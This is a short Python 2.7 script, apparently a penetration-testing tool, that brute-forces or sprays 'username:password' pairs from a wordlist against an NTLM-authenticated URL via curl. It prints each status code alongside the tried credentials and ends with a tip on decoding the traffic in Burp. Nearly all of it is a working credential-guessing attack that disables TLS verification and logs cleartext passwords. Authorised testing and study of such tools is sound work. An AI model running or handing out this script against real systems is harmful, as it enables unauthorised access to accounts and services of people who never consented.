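#!/usr/bin/python2.7
"""Try each "username:password" pair from a wordlist against an NTLM URL.

For every pair the script runs curl with --ntlm and prints the HTTP status
code curl reports, followed by the credentials that produced it.
"""
import os
import subprocess
import sys
import time

# wordlist contains "username:password" lines
with open("user_pass2.txt", "r") as wordlist_file:
    wordlist = wordlist_file.read().splitlines()

url = "https://example.com/ntlmv2"
domain = ""  # without domain, local authentication
# domain = "DOMAIN\\"  # with domain - one escaped backslash is enough now
#                      # that no shell re-parses the string

# curl is started from an argument list, never through a shell: wordlist
# entries are arbitrary text, and characters such as ; $ ` ' or spaces would
# otherwise be interpreted as shell syntax on the machine running the script.
# -k turns off TLS certificate verification, so the connection to the host is
# not authenticated.
curl_args = [
    "curl",
    "-s",
    "-o", os.devnull,
    "-w", "%{http_code}",
    "-k",
    "--ntlm",
]

for line in wordlist:
    # Split on the first ":" only, so a password that itself contains ":"
    # is kept whole instead of being cut at the second colon.
    username, separator, password = line.partition(":")
    if not separator or not username:
        # Blank or malformed line (no "username:password" shape): skip it
        # rather than abort the whole run with an IndexError.
        continue

    time.sleep(2)
    account = domain + username

    # NOTE: the credentials are passed in curl's argument vector, which other
    # local users can usually read from the process list while curl runs.
    subprocess.call(curl_args + ["-u", account + ":" + password, url])

    # curl has already written the status code to stdout without a newline;
    # finish the line with the credentials that were tried. The output holds
    # cleartext passwords, so any saved log of it is sensitive.
    sys.stdout.write(" - " + account + ":" + password + "\n")
    sys.stdout.flush()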
There is a Burp extension for this, NTLM Challenge Decoder. Proxy curl through Burp by setting the http_proxy and https_proxy environment variables in the terminal, then confirm that you can decode the NTLM requests in Burp (in Repeater, select the extension).